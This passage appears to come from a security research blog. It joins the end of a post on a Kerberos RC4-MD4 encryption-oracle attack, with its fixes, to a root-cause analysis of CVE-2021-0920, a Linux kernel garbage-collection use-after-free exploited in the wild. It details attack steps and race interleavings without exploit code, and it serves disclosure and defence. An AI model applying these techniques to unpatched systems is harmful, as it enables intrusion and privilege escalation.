The key to the exploit is to reverse the previous attack, instead of using the timestamp to decrypt the AS-REP we'll use the AS-REP to encrypt a timestamp. We can then use the timestamp value when sent to the KDC as an encryption oracle to brute force enough bytes of the key stream to decrypt the TGT's session key. For example, if we remove the optional microseconds component of the timestamp we get the following DER encoded values:


Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between known bytes in the AS-REP and the timestamp string which can be used to generate a valid encrypted timestamp.

The diagram shows that currently there's no overlap between the timestamp, represented by the T bytes, and the 40 bit session key. However, we know or at least can calculate the entire DER encoded data for the AS-REP to cover the entire timestamp buffer. We can use this to calculate the keystream for the user's RC4-MD4 key without actually knowing the key itself. With the key stream we can encrypt a valid timestamp and send it to the KDC. 


If the KDC responds with a valid AS-REP then we know we've correctly calculated the key stream. How can we use this to start decrypting the session key? The KerberosTime value used for the timestamp is an ASCII string of the form YYYYMMDDHHmmssZ. The KDC parses this string to a format suitable for processing by the server. The parser takes the time as a NUL terminated string, so we can add an additional NUL character to the end of the string and it shouldn't affect the parsing. Therefore we can change the timestamp to the following:



Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between a final NUL character at the end of the timestamp string which overlaps with the first byte of the 40 bit session key.

We can now guess a value for the encrypted NUL character and send the new timestamp to the KDC. If the KDC returns an error we know that the parsing failed as it didn't decrypt to a NUL character. However, if the authentication succeeds the value we guessed is the next byte in the key stream and we can decrypt the first byte of the session key.


At this point we've got a problem, we can't just add another NUL character as the parser would stop on the first one we sent. Even if the value didn't decrypt to a NUL it wouldn't be possible to detect. This is when a second trick comes into play, instead of extending the string we can abuse the way value lengths are encoded in DER. A length can be in one of two forms, a short form if the length is less than 128, or a long form for everything else. 


For the short form the length is encoded in a single byte. For the long form, the first byte has the top bit set to 1, and the lower 7 bits encode the number of trailing bytes of the length value in big-endian format. For example in the above diagram the timestamp's total size is 0x14 bytes which is stored in the short form. We can instead encode the length in an arbitrary sized long form, for example 0x81 0x14, 0x82 0x00 0x14, 0x83 0x00 0x00 0x14 etc. The examples shown below move the NUL character to brute force the next two bytes of the session key:



Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows extending the first length field so there is an overlap between a final NUL character at the end of the timestamp string which overlaps with the second and third bytes of the 40 bit session key.

Even though technically DER should expect the shortest form necessary to encode the length the Microsoft ASN.1 library doesn't enforce that when parsing so we can just repeat this length encoding trick to cover the remaining 4 unknown bytes of the key. As the exploit brute forces one byte at a time the maximum number of requests that we'd need to send to the KDC is 5 × 28 which is 1280 requests as opposed to 240 requests which would be around 1 trillion. 


Even with such a small number of requests it can still take around 30 seconds to brute force the key, but that still makes it a practical attack. Although it would be very noisy on the network and you'd expect any competent EDR system to notice, it might be too late at that point.

The Fixes

The only fix I can find is in the KDC service for the domain controller. Microsoft has added a new flag which by default disables the RC4-MD4 algorithm and an old variant of RC4-HMAC with the encryption type of -133. This behavior can be re-enabled by setting the KDC configuration registry value AllowOldNt4Crypto. The reference to NT4 is a good indication on how long this vulnerability has existed as it presumably pre-dates the introduction of Kerberos in Windows 2000. There are probably some changes to the client as well, but I couldn't immediately find them and it's not really worth my time to reverse engineer it.


It'd be good to mitigate the risk of similar attacks before they're found. Disabling RC4 is definitely recommended, however that can bring its own problems. If this particular vulnerability was being exploited in the wild it should be pretty easy to detect. Also unusual Kerberos encryption types would be an immediate red-flag as well as the repeated login attempts.


Another option is to enforce Kerberos Armoring (FAST) on all clients and KDCs in the environment. This would make it more difficult to inspect and tamper with Kerberos authentication traffic. However it's not a panacea, for example for FAST to work the domain joined computer needs to first authenticate without FAST to get a key they can then use for protecting the communications. If that initial authentication is compromised the entire protection fails.


The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)

10 August 2022 at 23:00

A deep dive into an in-the-wild Android exploit

Guest Post by Xingyu Jin, Android Security Research

This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules.

Overview of in-the-wild CVE-2021-0920 exploits

A surveillance vendor named Wintego has developed an exploit for Linux socket syscall 0-day, CVE-2021-0920, and used it in the wild since at least November 2020 based on the earliest captured sample, until the issue was fixed in November 2021.  Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin, and applied to Samsung devices in Samsung's December 2021 security update.

Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously. The Google Android Security Team performed the full deep-dive analysis of the exploit.

This issue was initially discovered in 2016 by a RedHat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patch the issue until it was re-reported in 2021.

Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) in a kernel sk_buff object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read / write primitives and bypass Samsung RKP to elevate to root. Other Android devices were also vulnerable, but we did not find any exploit samples against them.

Text extracted from captured samples dubbed the vulnerability “quantum Linux kernel garbage collection”, which appears to be a fitting title for this blogpost.

Introduction

CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTS is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference-counting file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, sk_buff object. In the following sections, we’ll explain the SCM_RIGHTS garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel.

What is SCM_RIGHTS?

Linux developers can share file descriptors (fd) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTS will add a reference to the underlying file struct. This means that the process that is sending the file descriptors can immediately close the file descriptor on their end, even if the receiving process has not yet accepted and taken ownership of the file descriptors. When the file descriptors are in the “queued” state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed. To track this “queued” state, this LWN article does a great job explaining SCM_RIGHTS reference counting, and it's recommended reading before continuing on with this blogpost.

Sending

As stated previously, a unix domain socket uses the syscall sendmsg to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, we’ll start from the sender’s point of view. We start with the kernel function unix_stream_sendmsg, which implements the sendmsg syscall. To implement the SCM_RIGHTS functionality, the kernel uses the structure scm_fp_list for managing all the transmitted file structures. scm_fp_list stores the list of file pointers to be passed.

struct scm_fp_list {

        short                   count;

        short                   max;

        struct user_struct      *user;

        struct file             *fp[SCM_MAX_FD];

};

unix_stream_sendmsg invokes scm_send (af_unix.c#L1886) to initialize the scm_fp_list structure, linked by the scm_cookie structure on the stack.

struct scm_cookie {

        struct pid              *pid;           /* Skb credentials */

        struct scm_fp_list      *fp;            /* Passed files         */

        struct scm_creds        creds;          /* Skb credentials      */

#ifdef CONFIG_SECURITY_NETWORK

        u32                     secid;          /* Passed security ID   */

#endif

};

To be more specific, scm_send → __scm_send → scm_fp_copy (scm.c#L68) reads the file descriptors from the userspace and initializes scm_cookie->fp which can contain SCM_MAX_FD file structures.

Since the Linux kernel uses the sk_buff (also known as socket buffers or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skb function to link the scm_cookie->fp to a corresponding skb object. This occurs in unix_attach_fds (scm.c#L103):

/*

 * Need to duplicate file references for the sake of garbage

 * collection.  Otherwise a socket in the fps might become a

 * candidate for GC while the skb is not yet queued.

 */

UNIXCB(skb).fp = scm_fp_dup(scm->fp);

if (!UNIXCB(skb).fp)

        return -ENOMEM;

The scm_fp_dup call in unix_attach_fds increases the reference count of the file descriptor that’s being passed so the file is still valid even after the sender closes the transmitted file descriptor later:

struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)

{

        struct scm_fp_list *new_fpl;

        int i;

        if (!fpl)

                return NULL;

        new_fpl = kmemdup(fpl, offsetof(struct scm_fp_list, fp[fpl->count]),

                          GFP_KERNEL);

        if (new_fpl) {

                for (i = 0; i < fpl->count; i++)

                        get_file(fpl->fp[i]);

                new_fpl->max = new_fpl->count;

                new_fpl->user = get_uid(fpl->user);

        }

        return new_fpl;

}

Let’s examine a concrete example. Assume we have sockets A and B. The A attempts to pass itself to B. After the SCM_RIGHTS datagram is sent, the newly allocated skb from the sender will be appended to the B’s sk_receive_queue which stores received datagrams:

unix_stream_sendmsg creates sk_buff which contains the structure scm_fp_list. The scm_fp_list has a fp pointer points to the transmitted file (A). The sk_buff is appended to the receiver queue and the reference count of A is 2.

sk_buff carries scm_fp_list structure

The reference count of A is incremented to 2 and the reference count of B is still 1.

Receiving

Now, let’s take a look at the receiver side unix_stream_read_generic (we will not discuss the MSG_PEEK flag yet, and focus on the normal routine). First of all, the kernel grabs the current skb from sk_receive_queue using skb_peek. Secondly, since scm_fp_list is attached to the skb, the kernel will call unix_detach_fds (link) to parse the transmitted file structures from skb and clear the skb from sk_receive_queue:

/* Mark read part of skb as used */

if (!(flags & MSG_PEEK)) {

        UNIXCB(skb).consumed += chunk;

        sk_peek_offset_bwd(sk, chunk);

        if (UNIXCB(skb).fp)

                unix_detach_fds(&scm, skb);

        if (unix_skb_len(skb))

                break;

        skb_unlink(skb, &sk->sk_receive_queue);

        consume_skb(skb);

        if (scm.fp)

                break;

The function scm_detach_fds iterates over the list of passed file descriptors (scm->fp) and installs the new file descriptors accordingly for the receiver:

for (i=0, cmfptr=(__force int __user *)CMSG_DATA(cm); i<fdmax;

     i++, cmfptr++)

{

        struct socket *sock;

        int new_fd;

        err = security_file_receive(fp[i]);

        if (err)

                break;

        err = get_unused_fd_flags(MSG_CMSG_CLOEXEC & msg->msg_flags

                                  ? O_CLOEXEC : 0);

        if (err < 0)

                break;

        new_fd = err;

        err = put_user(new_fd, cmfptr);

        if (err) {

                put_unused_fd(new_fd);

                break;

        }

        /* Bump the usage count and install the file. */

        sock = sock_from_file(fp[i], &err);

        if (sock) {

                sock_update_netprioidx(&sock->sk->sk_cgrp_data);

                sock_update_classid(&sock->sk->sk_cgrp_data);

        }

        fd_install(new_fd, get_file(fp[i]));

}

/*

 * All of the files that fit in the message have had their

 * usage counts incremented, so we just free the list.

 */

__scm_destroy(scm);

Once the file descriptors have been installed, __scm_destroy (link) cleans up the allocated scm->fp and decrements the file reference count for every transmitted file structure:

void __scm_destroy(struct scm_cookie *scm)

{

        struct scm_fp_list *fpl = scm->fp;

        int i;

        if (fpl) {

                scm->fp = NULL;

                for (i=fpl->count-1; i>=0; i--)

                        fput(fpl->fp[i]);

                free_uid(fpl->user);

                kfree(fpl);

        }

}

Reference Counting and Inflight Counting

As mentioned above, when a file descriptor is passed using SCM_RIGHTS, its reference count is immediately incremented. Once the recipient socket has accepted and installed the passed file descriptor, the reference count is then decremented. The complication comes from the “middle” of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed the file descriptor.

Let’s consider the following scenario:

  1. The process creates sockets A and B.
  2. A sends socket A to socket B.
  3. B sends socket B to socket A.
  4. Close A.
  5. Close B.

Socket A and B form a reference count cycle.

Scenario for reference count cycle

Both sockets are closed prior to accepting the passed file descriptors.The reference counts of A and B are both 1 and can't be further decremented because they were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures and an unbreakable cycle is formed. The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflight count was implemented to identify potential garbage. Each time the reference count is increased due to an SCM_RIGHTS datagram being sent, the inflight count will also be incremented.

When a file descriptor is sent by SCM_RIGHTS datagram, the Linux kernel puts its unix_sock into a global list gc_inflight_list. The kernel increments unix_tot_inflight which counts the total number of inflight sockets. Then, the kernel increments u->inflight which tracks the inflight count for each individual file descriptor in the unix_inflight function (scm.c#L45) invoked from unix_attach_fds:

void unix_inflight(struct user_struct *user, struct file *fp)

{

        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {

                struct unix_sock *u = unix_sk(s);

                if (atomic_long_inc_return(&u->inflight) == 1) {

                        BUG_ON(!list_empty(&u->link));

                        list_add_tail(&u->link, &gc_inflight_list);

                } else {

                        BUG_ON(list_empty(&u->link));

                }

                unix_tot_inflight++;

        }

        user->unix_inflight++;

        spin_unlock(&unix_gc_lock);

}

Thus, here is what the sk_buff looks like when transferring a file descriptor within sockets A and B:

When the file descriptor A sends itself to the file descriptor B, the reference count of the file descriptor A is 2 and the inflight count is 1. For the receiver file descriptor B, the file reference count is 1 and the inflight count is 0.

The inflight count of A is incremented

When the socket file descriptor is received from the other side, the unix_sock.inflight count will be decremented.

Let’s revisit the reference count cycle scenario before the close syscall. This cycle is breakable because any socket files can receive the transmitted file and break the reference cycle: 

The file descriptor A sends itself to the file descriptor B and vice versa. The inflight count of the file descriptor A and B is both 1 and the file reference count is both 2.

Breakable cycle before close A and B

After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage:

The cycle becomes unbreakable after closing A and B. The reference count equals to the inflight count for A and B.

Unbreakable cycle after close A and B

Now, let’s check another example. Assume we have sockets A, B and 𝛼:

  1. A sends socket A to socket B.
  2. B sends socket B to socket A.
  3. B sends socket B to socket 𝛼.
  4. 𝛼 sends socket 𝛼 to socket B.
  5. Close A.
  6. Close B.

A, B and alpha form a breakable cycle.

Breakable cycle for A, B and 𝛼

The cycle is breakable, because we can get newly installed file descriptor B from the socket file descriptor 𝛼 and newly installed file descriptor A' from B’.

Garbage Collection

A high level view of garbage collection is available from lwn.net:

"If, instead, the two counts are equal, that file structure might be part of an unreachable cycle. To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set.

At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle."

To be more specific, the SCM_RIGHTS garbage collection system was developed in order to handle the unbreakable reference cycles. To identify which file descriptors are a part of unbreakable cycles:

  1. Add any unix_sock objects whose reference count equals its inflight count to the gc_candidates list.
  2. Determine if the socket is referenced by any sockets outside of the gc_candidates list. If it is then it is reachable, remove it and any sockets it references from the gc_candidates list. Repeat until no more reachable sockets are found.
  3. After this iterative process, only sockets who are solely referenced by other sockets within the gc_candidates list are left.

Let’s take a closer look at how this garbage collection process works. First, the kernel finds all the unix_sock objects whose reference counts equals their inflight count and puts them into the gc_candidates list (garbage.c#L242):

list_for_each_entry_safe(u, next, &gc_inflight_list, link) {

        long total_refs;

        long inflight_refs;

        total_refs = file_count(u->sk.sk_socket->file);

        inflight_refs = atomic_long_read(&u->inflight);

        BUG_ON(inflight_refs < 1);

        BUG_ON(total_refs < inflight_refs);

        if (total_refs == inflight_refs) {

                list_move_tail(&u->link, &gc_candidates);

                __set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);

                __set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);

        }

}

Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidates list. To do this, the kernel invokes scan_children (garbage.c#138) along with the function pointer dec_inflight to iterate through each candidate’s sk->receive_queue. It decreases the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):

/* Now remove all internal in-flight reference to children of

 * the candidates.

 */

list_for_each_entry(u, &gc_candidates, link)

        scan_children(&u->sk, dec_inflight, NULL);

After iterating through all the candidates, if a gc candidate still has a positive inflight count it means that it is referenced by objects outside of the gc_candidates list and therefore is reachable. These candidates should not be included in the gc_candidates list so the related inflight counts need to be restored.

To do this, the kernel will put the candidate to not_cycle_list instead and iterates through its receiver queue of each transmitted file in the gc_candidates list (garbage.c#L281) and increments the inflight count back. The entire process is done recursively, in order for the garbage collection to avoid purging reachable sockets:

/* Restore the references for children of all candidates,

 * which have remaining references.  Do this recursively, so

 * only those remain, which form cyclic references.

 *

 * Use a "cursor" link, to make the list traversal safe, even

 * though elements might be moved about.

 */

list_add(&cursor, &gc_candidates);

while (cursor.next != &gc_candidates) {

        u = list_entry(cursor.next, struct unix_sock, link);

        /* Move cursor to after the current position. */

        list_move(&cursor, &u->link);

        if (atomic_long_read(&u->inflight) > 0) {

                list_move_tail(&u->link, &not_cycle_list);

                __clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);

                scan_children(&u->sk, inc_inflight_move_tail, NULL);

        }

}

list_del(&cursor);

Now gc_candidates contains only “garbage”. The kernel restores original inflight counts from gc_candidates, moves candidates from not_cycle_list back to gc_inflight_list and invokes __skb_queue_purge for cleaning up garbage (garbage.c#L306).

/* Now gc_candidates contains only garbage.  Restore original

 * inflight counters for these as well, and remove the skbuffs

 * which are creating the cycle(s).

 */

skb_queue_head_init(&hitlist);

list_for_each_entry(u, &gc_candidates, link)

        scan_children(&u->sk, inc_inflight, &hitlist);

/* not_cycle_list contains those sockets which do not make up a

 * cycle.  Restore these to the inflight list.

 */

while (!list_empty(&not_cycle_list)) {

        u = list_entry(not_cycle_list.next, struct unix_sock, link);

        __clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);

        list_move_tail(&u->link, &gc_inflight_list);

}

spin_unlock(&unix_gc_lock);

/* Here we are. Hitlist is filled. Die. */

__skb_queue_purge(&hitlist);

spin_lock(&unix_gc_lock);

__skb_queue_purge clears every skb from the receiver queue:

/**

 *      __skb_queue_purge - empty a list

 *      @list: list to empty

 *

 *      Delete all buffers on an &sk_buff list. Each buffer is removed from

 *      the list and one reference dropped. This function does not take the

 *      list lock and the caller must hold the relevant locks to use it.

 */

void skb_queue_purge(struct sk_buff_head *list);

static inline void __skb_queue_purge(struct sk_buff_head *list)

{

        struct sk_buff *skb;

        while ((skb = __skb_dequeue(list)) != NULL)

                kfree_skb(skb);

}

There are two ways to trigger the garbage collection process:

  1. wait_for_unix_gc is invoked at the beginning of the sendmsg function if there are more than 16,000 inflight sockets
  2. When a socket file is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc.

Note that unix_gc is not preemptive. If garbage collection is already in process, the kernel will not perform another unix_gc invocation.

Now, let’s check this example (a breakable cycle) with a pair of sockets f00 and f01, and a single socket 𝛼:

  1. Socket f 00 sends socket f 00 to socket f 01.
  2. Socket f 01 sends socket f 01 to socket 𝛼.
  3. Close f 00.
  4. Close f 01.

Before starting the garbage collection process, the status of socket file descriptors are:

  • f 00: ref = 1, inflight = 1
  • f 01: ref = 1, inflight = 1
  • 𝛼: ref = 1, inflight = 0

f00, f01 and alpha form a breakable cycle.

Breakable cycle by f 00, f 01 and 𝛼

During the garbage collection process, f 00 and f 01 are considered garbage candidates. The inflight count of f 00 is dropped to zero, but the count of f 01 is still 1 because 𝛼 is not a candidate. Thus, the kernel will restore the inflight count from f 01’s receive queue. As a result, f 00 and f 01 are not treated as garbage anymore.

CVE-2021-0920 Root Cause Analysis

When a user receives SCM_RIGHTS message from recvmsg without the MSG_PEEK flag, the kernel will wait until the garbage collection process finishes if it is in progress. However, if the MSG_PEEK flag is on, the kernel will increment the reference count of the transmitted file structures without synchronizing with any ongoing garbage collection process. This may lead to inconsistency of the internal garbage collection state, making the garbage collector mark a non-garbage sock object as garbage to purge.

recvmsg without MSG_PEEK flag

The kernel function unix_stream_read_generic (af_unix.c#L2290) parses the SCM_RIGHTS message and manages the file inflight count when the MSG_PEEK flag is NOT set. Then, the function unix_stream_read_generic calls unix_detach_fds to decrement the inflight count. Then, unix_detach_fds clears the list of passed file descriptors (scm_fp_list) from the skb:

static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb)

{

        int i;

        scm->fp = UNIXCB(skb).fp;

        UNIXCB(skb).fp = NULL;

        for (i = scm->fp->count-1; i >= 0; i--)

                unix_notinflight(scm->fp->user, scm->fp->fp[i]);

}

The unix_notinflight from unix_detach_fds will reverse the effect of unix_inflight by decrementing the inflight count:

void unix_notinflight(struct user_struct *user, struct file *fp)

{

        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {

                struct unix_sock *u = unix_sk(s);

                BUG_ON(!atomic_long_read(&u->inflight));

                BUG_ON(list_empty(&u->link));

                if (atomic_long_dec_and_test(&u->inflight))

                        list_del_init(&u->link);

                unix_tot_inflight--;

        }

        user->unix_inflight--;

        spin_unlock(&unix_gc_lock);

}

Later skb_unlink and consume_skb are invoked from unix_stream_read_generic (af_unix.c#2451) to destroy the current skb. Following the call chain kfree(skb)->__kfree_skb, the kernel will invoke the function pointer skb->destructor (code) which redirects to unix_destruct_scm:

static void unix_destruct_scm(struct sk_buff *skb)

{

        struct scm_cookie scm;

        memset(&scm, 0, sizeof(scm));

        scm.pid  = UNIXCB(skb).pid;

        if (UNIXCB(skb).fp)

                unix_detach_fds(&scm, skb);

        /* Alas, it calls VFS */

        /* So fscking what? fput() had been SMP-safe since the last Summer */

        scm_destroy(&scm);

        sock_wfree(skb);

}

In fact, the unix_detach_fds will not be invoked again here from unix_destruct_scm because UNIXCB(skb).fp is already cleared by unix_detach_fds. Finally, fd_install(new_fd, get_file(fp[i])) from scm_detach_fds is invoked for installing a new file descriptor.

recvmsg with MSG_PEEK flag

The recvmsg process is different if the MSG_PEEK flag is set. The MSG_PEEK flag is used during receive to “peek” at the message, but the data is treated as unread. unix_stream_read_generic will invoke scm_fp_dup instead of unix_detach_fds. This increases the reference count of the inflight file (af_unix.c#2149):

/* It is questionable, see note in unix_dgram_recvmsg.

 */

if (UNIXCB(skb).fp)

        scm.fp = scm_fp_dup(UNIXCB(skb).fp);

sk_peek_offset_fwd(sk, chunk);

if (UNIXCB(skb).fp)

        break;

Because the data should be treated as unread, the skb is not unlinked and consumed when the MSG_PEEK flag is set. However, the receiver will still get a new file descriptor for the inflight socket.

recvmsg Examples

Let’s see a concrete example. Assume there are the following socket pairs:

  • f 00, f 01
  • f 10, f 11

Now, the program does the following operations:

  • f 00 → [f 00] → f 01 (means f 00 sends [f 00] to f 01)
  • f 10 → [f 00] → f 11
  • Close(f 00)

f00, f01, f10, f11 forms a breakable cycle.

Breakable cycle by f 00, f 01, f 10 and f 11

Here is the status:

  • inflight(f 00) = 2, ref(f 00) = 2
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

If the garbage collection process happens now, before any recvmsg calls, the kernel will choose f 00 as the garbage candidate. However, f 00 will not have the inflight count altered and the kernel will not purge any garbage.

If f 01 then calls recvmsg with MSG_PEEK flag, the receive queue doesn’t change and the inflight counts are not decremented. f 01 gets a new file descriptor f 00' which increments the reference count on f 00:

After f01 receives the socket file descriptor by MSG_PEEK, the reference count of f00 is incremented and the receive queue from f01 remains the same.

MSG_PEEK increment the reference count of f 00 while the receive queue is not cleared

Status:

  • inflight(f 00) = 2, ref(f 00) = 3
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

Then, f 01 calls recvmsg without MSG_PEEK flag, f 01’s receive queue is removed. f 01 also fetches a new file descriptor f 00'':

After f01 receives the socket file descriptor without MSG_PEEK, the receive queue is cleared and file descriptor f00''' is obtained.

The receive queue of f 01 is cleared and f 01'' is obtained from f 01

Status:

  • inflight(f 00) = 1, ref(f 00) = 3
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

UAF Scenario

From a very high level perspective, the internal state of Linux garbage collection can be non-deterministic because MSG_PEEK is not synchronized with the garbage collector. There is a race condition where the garbage collector can treat an inflight socket as a garbage candidate while the file reference is incremented at the same time during the MSG_PEEK receive. As a consequence, the garbage collector may purge the candidate, freeing the socket buffer, while a receiver may install the file descriptor, leading to a UAF on the skb object.

Let’s see how the captured 0-day sample triggers the bug step by step (simplified version, in reality you may need more threads working together, but it should demonstrate the core idea). First of all, the sample allocates the following socket pairs and single socket 𝛼:

  • f 00, f 01
  • f 10, f 11
  • f 20, f 21
  • f 30, f 31
  • sock 𝛼 (actually there might be even thousands of 𝛼 for protracting the garbage collection process in order to evade a BUG_ON check which will be introduced later).

Now, the program does the below operations:

Close the following file descriptors prior to any recvmsg calls:

  • Close(f 00)
  • Close(f 01)
  • Close(f 11)
  • Close(f 10)
  • Close(f 30)
  • Close(f 31)
  • Close(𝛼)

Here is the status:

  • inflight(f 00) = N + 1, ref(f 00) = N + 1
  • inflight(f 01) = 2, ref(f 01) = 2
  • inflight(f 10) = 3, ref(f 10) = 3
  • inflight(f 11) = 1, ref(f 11) = 1
  • inflight(f 20) = 0, ref(f 20) = 1
  • inflight(f 21) = 0, ref(f 21) = 1
  • inflight(f 31) = 1, ref(f 31) = 1
  • inflight(𝛼) = 1, ref(𝛼) = 1

If the garbage collection process happens now, the kernel will do the following scrutiny:

  • List f 00, f 01, f 10,  f 11, f 31, 𝛼 as garbage candidates. Decrease inflight count for the candidate children in each receive queue.
  • Since f 21 is not considered a candidate, f 11’s inflight count is still above zero.
  • Recursively restore the inflight count.
  • Nothing is considered garbage.

A potential skb UAF by race condition can be triggered by:

  1. Call recvmsg with MSG_PEEK flag from f 21 to get f 11’.
  2. Call recvmsg with MSG_PEEK flag from f 11 to get f 10’.
  3. Concurrently do the following operations:
  1. Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’.
  2. Call recvmsg with MSG_PEEK flag from f 10

How is it possible? Let’s see a case where the race condition is not hit so there is no UAF:

Thread 0

Thread 1

Thread 2

Call unix_gc

Stage0: List f 00, f 01, f 10,  f 11, f 31, 𝛼 as garbage candidates.

Call recvmsg with MSG_PEEK flag from f 21 to get f 11

Increase reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp);

Stage0: decrease inflight count from the child of every garbage candidate

Status after stage 0:

inflight(f 00) = 0

inflight(f 01) = 0

inflight(f 10) = 0

inflight(f 11) = 1

inflight(f 31) = 0

inflight(𝛼) = 0

Stage1: Recursively restore inflight count if a candidate still has inflight count.

Stage1: All inflight counts have been restored.

Stage2: No garbage, return.

Call recvmsg with MSG_PEEK flag from f 11 to get f 10

Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’

Call recvmsg with MSG_PEEK flag from f 10

Everyone is happy

Everyone is happy

Everyone is happy

However, if the second recvmsg occurs just after stage 1 of the garbage collection process, the UAF is triggered:

Thread 0

Thread 1

Thread 2

Call unix_gc

Stage0: List f 00, f 01, f 10,  f 11, f 31, 𝛼 as garbage candidates.

Call recvmsg with MSG_PEEK flag from f 21 to get f 11

Increase reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp);

Stage0: decrease inflight count from the child of every garbage candidates

Status after stage 0:

inflight(f 00) = 0

inflight(f 01) = 0

inflight(f 10) = 0

inflight(f 11) = 1

inflight(f 31) = 0

inflight(𝛼) = 0

Stage1: Start restoring inflight count.

Call recvmsg with MSG_PEEK flag from f 11 to get f 10

Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’

unix_detach_fds: UNIXCB(skb).fp = NULL

Blocked by spin_lock(&unix_gc_lock)

Stage1: scan_inflight cannot find candidate children from f 11. Thus, the inflight count accidentally remains the same.

Stage2: f 00, f 01, f 10, f 31, 𝛼 are garbage.

Stage2: start purging garbage.

Start calling recvmsg with MSG_PEEK flag from f 10’, which would expect to receive f 00'

Get skb = skb_peek(&sk->sk_receive_queue), skb is going to be freed by thread 0.

Stage2: for, calls __skb_unlink and kfree_skb later.

state->recv_actor(skb, skip, chunk, state) UAF

GC finished.

Start garbage collection.

Get f 10’’

Therefore, the race condition causes a UAF of the skb object. At first glance, we should blame the second recvmsg syscall because it clears skb.fp, the passed file list. However, if the first recvmsg syscall doesn’t set the MSG_PEEK flag, the UAF can be avoided because unix_notinflight is serialized with the garbage collection. In other words, the kernel makes sure the garbage collection is either not processed or finished before decrementing the inflight count and removing the skb. After unix_notinflight, the receiver obtains f11' and inflight sockets don't form an unbreakable cycle.

Since MSG_PEEK is not serialized with the garbage collection, when recvmsg is called with MSG_PEEK set, the kernel still considers f 11 as a garbage candidate. For this reason, the following next recvmsg will eventually trigger the bug due to the inconsistent state of the garbage collection process.

 

Patch Analysis

CVE-2021-0920 was found in 2016

The vulnerability was initially reported to the Linux kernel community in 2016. The researcher also provided the correct patch advice but it was not accepted by the Linux kernel community:

Linux kernel developers: Why would I apply a patch that's an RFC, doesn't have a proper commit message, lacks a proper signoff, and also lacks ACK's and feedback from other knowledgable developers?

Patch was not applied in 2016

In theory, anyone who saw this patch might come up with an exploit against the faulty garbage collector.

Patch in 2021

Let’s check the official patch for CVE-2021-0920. For the MSG_PEEK branch, it requests the garbage collection lock unix_gc_lock before performing sensitive actions and immediately releases it afterwards:

+       spin_lock(&unix_gc_lock);

+       spin_unlock(&unix_gc_lock);

The patch is confusing - it’s rare to see such lock usage in software development. Regardless, the MSG_PEEK flag now waits for the completion of the garbage collector, so the UAF issue is resolved.

BUG_ON Added in 2017

Andrey Ulanov from Google in 2017 found another issue in unix_gc and provided a fix commit. Additionally, the patch added a BUG_ON for the inflight count:

